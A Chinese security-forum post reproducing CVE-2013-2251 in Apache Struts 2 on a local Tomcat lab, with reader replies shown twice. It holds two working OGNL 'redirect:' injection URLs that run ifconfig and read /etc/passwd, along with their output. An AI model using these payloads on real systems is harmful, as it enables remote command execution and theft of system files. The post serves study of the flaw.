[原创]CVE-2013-2251 Apache Struts 2 高危漏洞重现构造及漏洞原理分析-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创]CVE-2013-2251 Apache Struts 2 高危漏洞重现构造及漏洞原理分析

发表于: 2013-7-19 11:07 13395

[原创]CVE-2013-2251 Apache Struts 2 高危漏洞重现构造及漏洞原理分析

仙果

2013-7-19 11:07

13395

　　admin001@ubuntu:/usr/local/development/tomcat7/bin$ java -version
　　java version "1.7.0_21"
　　OpenJDK Runtime Environment (IcedTea 2.3.9) (7u21-2.3.9-1ubuntu1)
　　OpenJDK Client VM (build 23.7-b01, mixed mode, sharing)
　　
　　Sudo wget 
　　http://apache.fayea.com/apache-mirror/tomcat/tomcat-7/v7.0.42/bin/apache-tomcat-7.0.42.tar.gz

　　sudo tar zxvf apache-tomcat-7.0.42.tar.gz

　　Sudo mv apache-tomcat-7.0.42 tomcat7

　　Cd tomcat7
　　Cd bin
　　Sudo gedit catalina.sh (不会使用Vim，汗！！！)

　　cygwin=false
　　darwin=false
　　os400=false
　　case "`uname`" in
　　CYGWIN*) cygwin=true;;
　　Darwin*) darwin=true;;
　　OS400*) os400=true;;

　　JAVA_HOME =/etc/java-7-openjdk
　　JAVA_OPTS="-server -Xms512m -Xmx1024m -XX:PermSize=600M -XX:MaxPermSize=600m -Dcom.sun.management.jmxremote"

　　Sodu ./ startup.sh

Sudo find / -name *openjdk*

　　/usr/local/development/tomcat7/webapps

　　/usr/local/development/tomcat7/webapps/ROOT

　　http://127.0.0.1:8080/struts2-blank/example/X.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27ifconfig%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}

　　eth0      Link encap:Ethernet  HWaddr 00:0c:29:58:66:9e  
　　          inet addr:192.168.199.138  Bcast:192.168.199.255  Mask:255.255.255.0
　　          inet6 addr: fe80::20c:29ff:fe58:669e/64 Scope:Link
　　          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
　　          RX packets:40469 errors:0 dropped:0 overruns:0 frame:0
　　          TX packets:23308 errors:0 dropped:0 overruns:0 carrier:0
　　          collisions:0 txqueuelen:1000 
　　          RX bytes:55069446 (55.0 MB)  TX bytes:1421989 (1.4 MB)
　　          Interrupt:19 Base address:0x2000 
　　
　　lo        Link encap:Local Loopback  
　　          inet addr:127.0.0.1  Mask:255.0.0.0
　　          inet6 addr: ::1/128 Scope:Host
　　          UP LOOPBACK RUNNING  MTU:65536  Metric:1
　　          RX packets:1638 errors:0 dropped:0 overruns:0 frame:0
　　          TX packets:1638 errors:0 dropped:0 overruns:0 carrier:0
　　          collisions:0 txqueuelen:0 
　　          RX bytes:479063 (479.0 KB)  TX bytes:479063 (479.0 KB)

　　http://127.0.0.1:8080/struts2-blank/example/X.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}

　　root:x:0:0:root:/root:/bin/bash
　　daemon:x:1:1:daemon:/usr/sbin:/bin/sh
　　bin:x:2:2:bin:/bin:/bin/sh
　　sys:x3:sys:/dev:/bin/sh
　　sync:x:4:65534:sync:/bin:/bin/sync
　　games:x:5:60:games:/usr/games:/bin/sh
　　man:x:6:12:man:/var/cache/man:/bin/sh
　　lp:x:7:7:lp:/var/spool/lpd:/bin/sh
　　mail:x:8:8:mail:/var/mail:/bin/sh
　　news:x:9:9:news:/var/spool/news:/bin/sh
　　uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
　　proxy:x:13:13:proxy:/bin:/bin/sh
　　www-data:x:33:33:www-data:/var/www:/bin/sh
　　backup:x:34:34:backup:/var/backups:/bin/sh
　　list:x:38:38:Mailing List Manager:/var/list:/bin/sh
　　irc:x:39:39:ircd:/var/run/ircd:/bin/sh
　　gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
　　nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
　　libuuid:x:100:101::/var/lib/libuuid:/bin/sh
　　syslog:x:101:103::/home/syslog:/bin/false
　　messagebus:x:102:105::/var/run/dbus:/bin/false
　　avahi-autoipd:x:103:106:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
　　usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
　　dnsmasq:x:105:65534:dnsmasq,,,:/var/lib/misc:/bin/false
　　whoopsie:x:106:111::/nonexistent:/bin/false
　　kernoops:x:107:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
　　rtkit:x:108:114:RealtimeKit,,,:/proc:/bin/false
　　speech-dispatcher:x:109:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
　　avahi:x:110:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
　　colord:x:111:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
　　pulse:x:112:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false
　　hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
　　gdm:x:114:121:Gnome Display Manager:/var/lib/gdm:/bin/false
　　saned:x:115:123::/home/saned:/bin/false
　　debian-spamd:x:116:124::/var/lib/spamassassin:/bin/sh
　　admin001:x:1000:1000:test,,,:/home/admin001:/bin/bash

登录后可查看完整内容

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！

上传的附件：

图片1.jpg （54.02kb，71次下载）
图片2.jpg （64.45kb，30次下载）
图片3.jpg （95.95kb，18次下载）
图片4.jpg （30.62kb，6次下载）
图片5.jpg （23.22kb，5次下载）
图片6.jpg （33.92kb，5次下载）

收藏・37

免费・5

支持

最新回复 (26) 1 2 ▶
kanxue 雪币： 47147 活跃值： (20445) 能力值： (RANK：350 ) 在线值：发帖 2375 回帖 17045 粉丝 541 关注私信	kanxue 8 2 楼 Apache 太不厚道了，怎么直接放出Poc。这2天黑客们太欢乐了，呵~ 2013-7-19 11:42 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 3 楼谢谢 kanxue大哥的置顶 2013-7-19 11:52 0
Speeday 雪币： 458 活跃值： (306) 能力值： ( LV12，RANK：400 ) 在线值：发帖 22 回帖 353 粉丝 14 关注私信	Speeday 8 4 楼看不懂，前来围观。。 2013-7-19 12:39 0
neite 雪币： 1626 活跃值： (148) 能力值： ( LV4，RANK：40 ) 在线值：发帖 17 回帖 105 粉丝 0 关注私信	neite 5 楼哈哈，大家有得忙了利用方法：http://bbs.pediy.com/showthread.php?t=175710 2013-7-19 12:52 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 6 楼分析得挺详细的，支持下，7.17，一个血雨腥风值得纪念的日子！ 2013-7-19 13:10 0
雾道雪币： 348 活跃值： (14) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 7 粉丝 0 关注私信	雾道 7 楼太给力了！！！谢谢分享 2013-7-19 13:42 0
tudiwangma 雪币： 154 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 48 粉丝 0 关注私信	tudiwangma 8 楼高效阿从环境搭建到漏洞分析一个晚上全部弄完了还有参考资料谢谢分享 2013-7-19 15:33 0
weibeat 雪币： 80 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 59 粉丝 0 关注私信	weibeat 9 楼果然效率很高啊，有没有人去用这个玩玩的？ 2013-7-19 15:38 0
kindsjay 雪币： 310 活跃值： (159) 能力值： ( LV12，RANK：200 ) 在线值：发帖 21 回帖 118 粉丝 1 关注私信	kindsjay 4 10 楼你发的挺快啊 2013-7-19 15:47 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 11 楼花了一整天+一个晚上，不是一个晚上，否则我就成神了，呵呵 2013-7-19 16:39 0
稻草人Z 雪币： 680 活跃值： (68) 能力值： ( LV6，RANK：90 ) 在线值：发帖 6 回帖 138 粉丝 1 关注私信	稻草人Z 2 12 楼来沾沾大神的文气 2013-7-19 18:56 0
zmworm 雪币： 5340 活跃值： (598) 能力值： (RANK：170 ) 在线值：发帖 45 回帖 308 粉丝 10 关注私信	zmworm 4 13 楼顶大神,先MARK,再研读 2013-7-19 22:35 0
zhingma 雪币： 5 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 21 回帖 203 粉丝 0 关注私信	zhingma 14 楼 Apache一直存在漏洞，因为Apache是服务软件当中用的最多的一种，基本上成黑客攻击是避免不了。集成更有危险，仙果给力，如果用红帽子9.0多好呀，装ubuntu最少半个小时。头痛。 2013-7-20 08:44 0
拍小强雪币： 23 活跃值： (70) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 28 粉丝 0 关注私信	拍小强 15 楼真心不靠谱的厂商。。 2013-7-21 00:42 0
ugvjewxf 雪币： 615 活跃值： (585) 能力值： ( LV4，RANK：40 ) 在线值：发帖 22 回帖 352 粉丝 11 关注私信	ugvjewxf 16 楼靠谱靠谱，没得赔偿，只能认宰， 2013-7-21 08:15 0
Aipsa 雪币： 19 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 12 回帖 122 粉丝 0 关注私信	Aipsa 17 楼看懂了，但是我这里测试没有这个问题。 2013-7-21 10:51 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 18 楼是否是版本不对。。。。 2013-7-21 13:04 0
suwey 雪币： 101 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 148 粉丝 1 关注私信	suwey 19 楼貌似struts在安全方面。。真的很不专业。。 2013-7-22 12:52 0
我来也龙雪币： 1047 活跃值： (110) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 30 粉丝 0 关注私信	我来也龙 20 楼学习了！写的不错哟！ 2013-7-23 14:07 0
upandup 雪币： 2 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 11 粉丝 0 关注私信	upandup 21 楼非常感谢，仙果大神，在下载相关的软件，晚上准备实战一下！我觉得这类文章好，除了看懂原理，还可以实践学习，希望这类文章多多益善。 2013-7-23 15:03 0
vvking 雪币： 1737 活跃值： (110) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 210 粉丝 0 关注私信	vvking 22 楼真心看不懂，不知道啥时候能到达这个功力。。。 2013-7-24 15:39 0
热火朝天雪币： 210 活跃值： (20) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 172 粉丝 0 关注私信	热火朝天 23 楼反正看不懂，看看热闹 2013-7-26 00:18 0
奮鬥雪币： 313 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 44 粉丝 0 关注私信	奮鬥 24 楼看雪的大牛就是叼爆了 2013-7-27 13:24 0
蓬莱草莽雪币： 16 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 1 回帖 10 粉丝 0 关注私信	蓬莱草莽 25 楼虽然看不懂，但是感觉好厉害的样子 2013-7-29 20:40 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

仙果

发帖

1507

回帖

860

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (26) 1 2 ▶
kanxue 雪币： 47147 活跃值： (20445) 能力值： (RANK：350 ) 在线值：发帖 2375 回帖 17045 粉丝 541 关注私信	kanxue 8 2 楼 Apache 太不厚道了，怎么直接放出Poc。这2天黑客们太欢乐了，呵~ 2013-7-19 11:42 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 3 楼谢谢 kanxue大哥的置顶 2013-7-19 11:52 0
Speeday 雪币： 458 活跃值： (306) 能力值： ( LV12，RANK：400 ) 在线值：发帖 22 回帖 353 粉丝 14 关注私信	Speeday 8 4 楼看不懂，前来围观。。 2013-7-19 12:39 0
neite 雪币： 1626 活跃值： (148) 能力值： ( LV4，RANK：40 ) 在线值：发帖 17 回帖 105 粉丝 0 关注私信	neite 5 楼哈哈，大家有得忙了利用方法：http://bbs.pediy.com/showthread.php?t=175710 2013-7-19 12:52 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 6 楼分析得挺详细的，支持下，7.17，一个血雨腥风值得纪念的日子！ 2013-7-19 13:10 0
雾道雪币： 348 活跃值： (14) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 7 粉丝 0 关注私信	雾道 7 楼太给力了！！！谢谢分享 2013-7-19 13:42 0
tudiwangma 雪币： 154 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 48 粉丝 0 关注私信	tudiwangma 8 楼高效阿从环境搭建到漏洞分析一个晚上全部弄完了还有参考资料谢谢分享 2013-7-19 15:33 0
weibeat 雪币： 80 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 59 粉丝 0 关注私信	weibeat 9 楼果然效率很高啊，有没有人去用这个玩玩的？ 2013-7-19 15:38 0
kindsjay 雪币： 310 活跃值： (159) 能力值： ( LV12，RANK：200 ) 在线值：发帖 21 回帖 118 粉丝 1 关注私信	kindsjay 4 10 楼你发的挺快啊 2013-7-19 15:47 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 11 楼花了一整天+一个晚上，不是一个晚上，否则我就成神了，呵呵 2013-7-19 16:39 0
稻草人Z 雪币： 680 活跃值： (68) 能力值： ( LV6，RANK：90 ) 在线值：发帖 6 回帖 138 粉丝 1 关注私信	稻草人Z 2 12 楼来沾沾大神的文气 2013-7-19 18:56 0
zmworm 雪币： 5340 活跃值： (598) 能力值： (RANK：170 ) 在线值：发帖 45 回帖 308 粉丝 10 关注私信	zmworm 4 13 楼顶大神,先MARK,再研读 2013-7-19 22:35 0
zhingma 雪币： 5 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 21 回帖 203 粉丝 0 关注私信	zhingma 14 楼 Apache一直存在漏洞，因为Apache是服务软件当中用的最多的一种，基本上成黑客攻击是避免不了。集成更有危险，仙果给力，如果用红帽子9.0多好呀，装ubuntu最少半个小时。头痛。 2013-7-20 08:44 0
拍小强雪币： 23 活跃值： (70) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 28 粉丝 0 关注私信	拍小强 15 楼真心不靠谱的厂商。。 2013-7-21 00:42 0
ugvjewxf 雪币： 615 活跃值： (585) 能力值： ( LV4，RANK：40 ) 在线值：发帖 22 回帖 352 粉丝 11 关注私信	ugvjewxf 16 楼靠谱靠谱，没得赔偿，只能认宰， 2013-7-21 08:15 0
Aipsa 雪币： 19 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 12 回帖 122 粉丝 0 关注私信	Aipsa 17 楼看懂了，但是我这里测试没有这个问题。 2013-7-21 10:51 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 18 楼是否是版本不对。。。。 2013-7-21 13:04 0
suwey 雪币： 101 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 148 粉丝 1 关注私信	suwey 19 楼貌似struts在安全方面。。真的很不专业。。 2013-7-22 12:52 0
我来也龙雪币： 1047 活跃值： (110) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 30 粉丝 0 关注私信	我来也龙 20 楼学习了！写的不错哟！ 2013-7-23 14:07 0
upandup 雪币： 2 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 11 粉丝 0 关注私信	upandup 21 楼非常感谢，仙果大神，在下载相关的软件，晚上准备实战一下！我觉得这类文章好，除了看懂原理，还可以实践学习，希望这类文章多多益善。 2013-7-23 15:03 0
vvking 雪币： 1737 活跃值： (110) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 210 粉丝 0 关注私信	vvking 22 楼真心看不懂，不知道啥时候能到达这个功力。。。 2013-7-24 15:39 0
热火朝天雪币： 210 活跃值： (20) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 172 粉丝 0 关注私信	热火朝天 23 楼反正看不懂，看看热闹 2013-7-26 00:18 0
奮鬥雪币： 313 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 44 粉丝 0 关注私信	奮鬥 24 楼看雪的大牛就是叼爆了 2013-7-27 13:24 0
蓬莱草莽雪币： 16 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 1 回帖 10 粉丝 0 关注私信	蓬莱草莽 25 楼虽然看不懂，但是感觉好厉害的样子 2013-7-29 20:40 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复